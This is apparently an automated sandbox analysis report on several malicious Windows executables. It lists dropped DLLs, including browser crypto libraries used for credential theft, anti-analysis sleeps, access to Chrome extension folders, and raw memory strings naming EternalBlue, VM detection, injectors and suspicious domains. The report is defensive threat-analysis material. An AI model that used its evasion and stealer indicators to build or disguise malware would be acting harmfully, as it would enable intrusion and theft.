Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\vcruntime140[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libudp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libdirectsound_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll
Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\Company\NewProduct\Uninstall.exe
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_a52_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\libvlc.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libasf_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll
Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\msvcp140[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll
Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[2].dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mozglue[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\libssp-0.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[1].dll
Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll
Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\freebl3[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Registry key enumerated: More than 154 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\yevbZfdCqR.exe TID: 6876 :: Thread sleep count: 226 > 30
Source: C:\Users\user\Desktop\yevbZfdCqR.exe TID: 7108 :: Thread sleep time: -45000s >= -30000s
Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe TID: 6584 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe TID: 6712 :: Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe TID: 7024 :: Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe TID: 6620 :: Thread sleep count: 199 > 30
Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe TID: 6640 :: Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe TID: 5512 :: Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe :: File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe :: Last function: Thread delayed (2 identical rows)
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Last function: Thread delayed (2 identical rows)
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0045F948 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0045FA71h
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0043C650 lstrlenW,GetFileSizeEx,SetCommState,GetOverlappedResult,GetMenuInfo,GetMenuCheckMarkDimensions,GetMessageTime,GetConsoleAliasesLengthA,SearchPathW,ReleaseActCtx,LoadLibraryW,GlobalFix,GetBinaryTypeW,SetThreadLocale,SetProcessPriorityBoost,EnumResourceNamesW,FreeEnvironmentStringsA,FindFirstFileA,FindNextFileW,CreateDirectoryExW,GetLocalTime,WriteProfileSectionA,GetPrivateProfileStringW,WriteFile,SetVolumeLabelW,BuildCommDCBW,InterlockedExchange,FindResourceExW,AddAtomW,OpenMutexA,WriteConsoleInputW,GetConsoleScreenBufferInfo,SetConsoleTitleW,CopyFileExW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004625DE __EH_prolog3_GS,FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412D8E _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412F8E __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405764 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0045E91A GetSystemInfo,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
      Source: yevbZfdCqR.exe, 00000001.00000003.651786144.0000000005E51000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X|
      Source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmpBinary or memory string: VMware
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefenderWindows 874[:^xdigit:]\dsefix.exealarm clockapplicationattack_typebad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedgetpeernamegetsocknamehost is nilhttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextnotify-hostorannis.comraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllsecure_bootshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableupdate-dataupload-fileuserenv.dllversion=179vm detectedvmusrvc.exewininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: entersyscalleternalblue:event-existsexit status found av: %sgcpacertraceget_app_namegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmutex-existsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffertransmitfileulrichard.chunexpected )unknown portunknown typevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWR
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.txt.xml0x%x108020063125: p=:445ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: /app/app.exe100-continue152587890625762939453125Bidi_ControlCDN is emptyCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocWindows 1250Windows 1251Windows 1252Windows 1253Windows 1254Windows 1255Windows 1256Windows 1257Windows 1258Winmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
